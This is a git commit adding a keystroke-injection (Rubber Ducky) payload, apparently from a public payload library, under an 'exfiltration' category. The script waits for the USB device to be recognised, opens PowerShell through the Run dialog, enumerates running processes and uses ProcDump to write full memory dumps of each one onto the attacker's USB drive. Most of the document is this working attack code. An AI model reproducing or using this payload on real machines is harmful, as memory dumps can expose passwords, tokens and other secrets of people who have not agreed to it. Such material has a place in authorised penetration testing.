Dump Windows Memory Through ProcDump

This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump.
2024-03-26 10:11:55 +01:00 · 2024-03-26 10:11:55 +01:00 · dbe778bb92
parent bf2dfb7c17
commit dbe778bb92
1 changed files with 70 additions and 0 deletions
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@ -0,0 +1,70 @@
+REM ########################################################
+REM #                                                      #
+REM # Title        : Dump Windows Memory Through ProcDump  #
+REM # Author       : Aleff                                 #
+REM # Version      : 1.0                                   #
+REM # Category     : Exfiltration                          #
+REM # Target       : Windows                               #
+REM #                                                      #
+REM ########################################################
+
+
+REM Requirements:
+REM     - Authorization to execute powershell commands
+
+
+REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
+DEFINE $WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
+
+REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\'
+DEFINE $PATH_TO_EXE \ProcDump\Procdump\
+
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+GUI r
+DELAY 2000
+
+STRING powershell
+ENTER
+DELAY 2000
+
+STRINGLN_POWERSHELL
+    $m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
+    $m+=":";
+    cd "$m\\";
+    $a=tasklist /FI "Status eq Running" /FO LIST;
+    foreach ($i in $a){
+        if ( $i -like '*PID*'){
+            $i -match 'PID.\s+(.+)';
+            ".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];
+        }
+    }
+    exit;
+END_STRINGLN